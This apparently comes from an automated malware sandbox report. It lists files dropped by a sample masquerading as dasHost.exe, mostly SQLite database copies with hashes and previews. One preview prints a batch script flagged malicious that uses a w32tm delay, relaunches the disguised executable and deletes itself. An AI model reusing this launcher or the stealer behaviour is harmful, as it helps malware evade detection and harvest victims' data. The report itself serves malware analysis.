                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\2o9pSPowa3

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\3Vt2busZXz

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\3oD9x38GTd

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\4E7PwKcRJr

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\4T0SBw9BBz

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\4UHdZGmSOM

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\4YIM0vaKJU

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\4tY2I0JyeN

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\5LOr5vzhWb

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\5QcHOBnysw

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\5WgIgWDXua

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\5XkL7FHNMM

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\5lJ5SP1bed

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):25
                                                                        Entropy (8bit):4.243856189774724
                                                                        Encrypted:false
                                                                        SSDEEP:3:NsV9CGq:KV4Gq
                                                                        MD5:4B5238D0D9D06EF52EECEE54044A665A
                                                                        SHA1:E0B2321ED85E0D70C86B30785A40C82D2F58DA6C
                                                                        SHA-256:9EA9415B609BBFCA4B16CA500707648F85E25AB6B59E6AE5206018185824C0D4
                                                                        SHA-512:F1F6A42FAFCA79DC1A9C56AAD1A2A420307EE87F6723D8A5C6116F30EF9B8B1DD9E4C3ADA9E39452E7F69F1FA0C31C9AB756A4B3F3EF34A1DF8704AE19E01B4B
                                                                        Malicious:false
                                                                        Preview:0DXfqpHPSAXpyDMBgL6AsehTS

                                                                        C:\Users\user\AppData\Local\Temp\5psvvUPunM

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\6BUcnCI3cs

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):240
                                                                        Entropy (8bit):5.178145391884472
                                                                        Encrypted:false
                                                                        SSDEEP:6:hCijTg3Nou1SV+DER5GKG+0dbKKOZG1wkn23fDoJX:HTg9uYDEfGj+OgfroF
                                                                        MD5:6EE3DCB6A90DBE90910BE8A3E218676F
                                                                        SHA1:A965C8CF6032D7F454BF3E84F1B50641EC50E66E
                                                                        SHA-256:144D8EACF6236F170EF5C1D07C0EC810F4A46D825BD2023193D469DFA9012D64
                                                                        SHA-512:9A218EA213879A6419E8C5DD113CFA7D40E19DBA34407A75770A451F18DBEB7B59F5F732F7959935647BB8F9C940D22C1D14E548C36EECEA8DCCECC5553B3EC8
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\6XMNLNVLzg.bat"

                                                                        C:\Users\user\AppData\Local\Temp\7zZteIQkMp

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\8GRxGVvGHg

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\8SankmPgZM

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\8cwcDHU7zp

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\8fsHXHVPKX

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\8hq9OhlEem

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\8wfVz9TQR9

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
